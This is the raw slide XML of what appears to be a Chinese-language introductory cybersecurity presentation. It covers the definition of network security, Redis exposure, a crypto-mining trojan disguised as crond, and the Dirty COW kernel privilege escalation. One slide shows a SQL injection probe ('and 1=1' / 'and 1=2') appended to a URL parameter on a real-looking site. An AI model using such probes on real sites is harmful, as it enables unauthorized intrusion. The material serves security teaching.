        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1443128"/>
            <a:ext cx="5259772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>深圳市某知名大学，直接打脸的有没有？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6853805" y="1892898"/>
            <a:ext cx="4684252" cy="4262201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="157489669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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="840166"/>
            <a:ext cx="3313728" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x01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网络安全的大环境与背景</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1538666"/>
            <a:ext cx="2627642" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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【1】</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网络安全的概念：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993900" y="2308329"/>
            <a:ext cx="8597900" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>网络服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>断。（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>来源某度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>科）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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993900" y="4006805"/>
            <a:ext cx="2209800" cy="2205782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="31107859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563248" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x4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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1012505"/>
            <a:ext cx="5259772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139634" y="2266319"/>
            <a:ext cx="5785790" cy="3827210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925424" y="2266319"/>
            <a:ext cx="6266576" cy="3827210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1381837"/>
            <a:ext cx="6457017" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.zendai.com/complay.php?id=7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页面显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.zendai.com/complay.php?id=7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>页面显示异常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="11701347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697901" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x04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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839462" y="1127736"/>
            <a:ext cx="6151093" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞分布。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1590551"/>
            <a:ext cx="9644833" cy="5200337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1032" name="Picture 8" descr="http://wanzao2.b0.upaiyun.com/system/pictures/2050072/original/a5257495dace95c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64817" y="103806"/>
            <a:ext cx="3644878" cy="15604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123122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697901" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x04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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1127736"/>
            <a:ext cx="6151093" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上生产环境发现的木马，隐藏为系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crond </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务，榨取机器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>资源，进行比特币，莱特币的挖矿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="230790" y="2246735"/>
            <a:ext cx="11870056" cy="4229593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="279893351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697901" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">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0x04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案列分析</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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1012505"/>
            <a:ext cx="5259772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内核提权（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirty COW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950320" y="2099116"/>
            <a:ext cx="8732821" cy="4693696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Users\Administrator\AppData\Local\YNote\data\mengtao10@163.com\8bc153eb2a1349b29832cdbf42fd22de\0.jpe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08407" y="4742989"/>
            <a:ext cx="3074734" cy="20498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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="1417311"/>
            <a:ext cx="7091131" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>影响范围：所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内核版本 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;=2.6.22 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的系统，都会受到该漏洞的影响。比如各类 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发行版：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CentOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSUSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等，也包括介于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内核的各类衍生产品，比如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统的手机和平板电脑、各类基于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内核的嵌入式设备和智能设备、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>镜像等等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="167438562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64862" y="514709"/>
            <a:ext cx="1697901" cy="452432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x05 </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小试牛刀</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
